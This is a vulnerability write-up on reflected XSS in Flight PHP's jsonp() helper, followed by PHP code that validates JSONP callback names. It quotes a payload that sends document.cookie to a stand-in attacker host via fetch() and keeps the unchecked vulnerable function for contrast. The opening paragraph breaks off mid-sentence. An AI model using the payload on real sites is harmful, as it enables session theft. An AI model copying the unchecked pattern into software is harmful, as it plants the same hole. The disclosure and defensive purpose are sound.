Flight PHP, Reflected XSS, CVE-None (critical)


How the mentioned CVE works: `Flight::jsonp()` in `flight/Engine.php` (lines 1000-1013) concatenates the `?jsonp=` query parameter directly into an `application/javascript` response body without any validation. The code calls `$this->request()->query[$param]` to retrieve the callback name, then writes `$callback . '(' . $json . ');'` via `write()`. No regex check or JavaScript identifier validation is performed. An attacker can supply a malicious value such as `;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//`. This string is embedded verbatim into the response. The `Content-Type` header is set to `application/javascript`, so when a victim loads the endpoint via `
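As an added illustration (not Flight's own code, and not the patch for this issue), the following PHP contrasts the unchecked concatenation described above with a JSONP writer that validates the callback name before it reaches the response body. The function names `is_safe_jsonp_callback`, `render_jsonp` and `render_jsonp_unchecked`, the 64-character limit and the sample inputs are all assumptions made for this example; the `$evil` string is the payload quoted in the write-up, used here only to show that the validator refuses it.

```php
<?php
// Added example, not code from Flight. Function names, the length cap and the
// sample inputs are hypothetical choices for this demonstration.

/**
 * Return true only if $callback is a plain JavaScript member path such as
 * "cb", "app.handlers.cb" or "$jq_1". Any ';', '(', quotes, whitespace or
 * other punctuation is rejected, so a reflected value can never break out of
 * the "callback(" ... ");" wrapper.
 */
function is_safe_jsonp_callback(string $callback): bool
{
    // Legitimate callback names are short; cap the length before matching.
    if ($callback === '' || strlen($callback) > 64) {
        return false;
    }
    // identifier(.identifier)* built from ASCII letters, digits, '_' and '$'.
    $re = '/^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/';
    return preg_match($re, $callback) === 1;
}

/**
 * Hardened JSONP body builder. Returns null when the callback is rejected so
 * the caller can answer 400 instead of echoing attacker-controlled input.
 */
function render_jsonp(array $data, string $callback): ?string
{
    if (!is_safe_jsonp_callback($callback)) {
        return null;
    }
    // JSON_HEX_* keeps '<', '>', '&' and quotes escaped inside the payload in
    // case the response is ever sniffed or rendered as HTML.
    $json = json_encode(
        $data,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    // A leading comment makes the body start with a non-executable token.
    return '/**/' . $callback . '(' . $json . ');';
}

/**
 * The vulnerable pattern from the write-up, kept only for contrast: the
 * callback is concatenated with no check at all.
 */
function render_jsonp_unchecked(array $data, string $callback): string
{
    return $callback . '(' . json_encode($data) . ');';
}

// Constructed inputs: a legitimate callback and the payload quoted above.
$data = ['status' => 'ok'];
$good = 'app.onData';
$evil = ";window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//";

// Hardened: the legitimate callback is wrapped, the payload is refused (null).
var_dump(render_jsonp($data, $good));
var_dump(render_jsonp($data, $evil));

// Unchecked: the payload lands verbatim at the start of the JavaScript body.
echo render_jsonp_unchecked($data, $evil), PHP_EOL;

// Sketch of a hardened handler around render_jsonp() (hypothetical):
//   header('Content-Type: application/javascript; charset=utf-8');
//   header('X-Content-Type-Options: nosniff');
//   $body = render_jsonp($data, $_GET['jsonp'] ?? '');
//   if ($body === null) { http_response_code(400); exit; }
//   echo $body;
```

The allowlist regex, rather than escaping, is the usual fix for JSONP callbacks: the callback name is executed as code by the browser, so there is no escaping scheme that makes an arbitrary string safe in that position. Pairing it with `X-Content-Type-Options: nosniff` keeps the endpoint from being reinterpreted as HTML, and rejecting with a 400 (instead of falling back to a default callback) makes abuse attempts visible in access logs.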
